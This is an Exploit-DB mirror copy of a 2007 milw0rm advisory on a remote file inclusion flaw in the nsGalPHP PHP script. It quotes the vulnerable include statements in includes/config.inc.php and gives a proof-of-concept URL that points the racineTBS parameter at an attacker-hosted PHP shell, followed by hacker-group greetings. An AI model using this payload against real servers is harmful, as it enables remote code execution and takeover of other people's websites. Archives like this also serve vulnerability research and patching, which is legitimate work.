exploit-db-mirror/exploits/php/webapps/3205.txt

                   _________________________________
          ________|                                 |________
          \       |              S.W.A.T.           |       /
           \      |                                 |      /
           /      |_________________________________|      \
          /___________)                         (___________\
    ------------------------------------------------------------------------------------------------------------------------
    Script:nsGalPHP
    Affected Version:unknown
    Downlaoad&Victim:http://www.easy-script.com/compt.php?id=3521
    ------------------------------------------------------------------------------------------------------------------------
    Author:S.W.A.T.
    ------------------------------------------------------------------------------------------------------------------------
    Bug in (includes/config.inc.php)
    Vul Code;
    include_once($racineTBS.'includes/tbs_class.php');
    include_once($racineTBS.'includes/fonctions.inc.php');
    require($racineTBS.'lang/'.$config['langueDefaut'].'.php');
    ------------------------------------------------------------------------------------------------------------------------
    POC:
    http://[target]/[path]/includes/config.inc.php?racineTBS=[PHPSHELL]
    ------------------------------------------------------------------------------------------------------------------------
    Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
    Special Greetz:All Member Of XmorsTEAM
    ------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-27]